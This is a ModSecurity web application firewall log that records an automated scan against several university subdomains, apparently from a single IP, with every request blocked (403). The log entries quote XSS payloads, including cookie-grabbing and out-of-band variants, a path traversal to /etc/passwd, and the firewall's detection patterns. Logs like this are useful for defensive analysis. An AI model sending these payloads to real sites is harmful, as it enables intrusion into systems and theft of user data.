[Tue Aug 29 11:51:30.579528 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAnTlK4AAAAA"]
[Tue Aug 29 11:51:30.581604 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UsCo-f0AAAfWOFgAAAAL"]
[Tue Aug 29 11:51:30.607823 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAnHQfEAAAAT"]
[Tue Aug 29 11:51:30.608147 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAm80QAAAAAF"]
[Tue Aug 29 11:51:30.611736 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAkyyGEAAAAW"]
[Tue Aug 29 11:51:30.617118 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAlUljgAAAA0"]
[Tue Aug 29 11:51:30.619755 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAkr0G4AAAAC"]
[Tue Aug 29 11:51:30.619970 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAnIlhcAAAAV"]
[Tue Aug 29 11:51:30.677458 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAnDFzgAAAAM"]
[Tue Aug 29 11:51:30.711316 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAm80QEAAAAF"]
[Tue Aug 29 11:51:30.750630 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAm80QIAAAAF"]
[Tue Aug 29 11:51:30.751496 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAnTlLEAAAAA"]
[Tue Aug 29 11:51:30.755151 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAfWOFoAAAAL"]
[Tue Aug 29 11:51:31.547668 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAmQ-yYAAAAb"]
[Tue Aug 29 11:51:31.549205 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAm80QMAAAAF"]
[Tue Aug 29 11:51:31.551208 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAnB5WIAAAAJ"]
[Tue Aug 29 11:51:31.551648 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAnDFzoAAAAM"]
[Tue Aug 29 11:51:31.551793 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15U8Co-f0AAAm@5y0AAAAH"]
[Tue Aug 29 11:51:31.552098 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15U8Co-f0AAAkyyGMAAAAW"]
[Tue Aug 29 11:51:31.553697 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAkr0HEAAAAC"]
[Tue Aug 29 11:51:31.556833 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15U8Co-f0AAAmLPT4AAAAN"]
[Tue Aug 29 11:51:31.572781 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAm80QQAAAAF"]
[Tue Aug 29 11:51:31.573447 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15U8Co-f0AAAnIlhsAAAAV"]
[Tue Aug 29 11:51:32.587136 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAmQ-ygAAAAb"]
[Tue Aug 29 11:51:32.645748 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAnHQfQAAAAT"]
[Tue Aug 29 11:51:32.669304 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAm7m-4AAAAE"]
[Tue Aug 29 11:51:32.684575 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAnHQfUAAAAT"]
[Tue Aug 29 11:51:32.701710 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAm7m-8AAAAE"]
[Tue Aug 29 11:51:33.584506 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VcCo-f0AAAmQ-zAAAAAb"]
[Tue Aug 29 11:51:33.730932 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VcCo-f0AAAnZfDMAAAAG"]
[Tue Aug 29 11:51:34.406771 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAmQ-zQAAAAb"]
[Tue Aug 29 11:51:34.703728 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAnf3kAAAAAM"]
[Tue Aug 29 11:51:34.808454 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAmQ-zkAAAAb"]
[Tue Aug 29 11:51:34.829452 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnB5WoAAAAJ"]
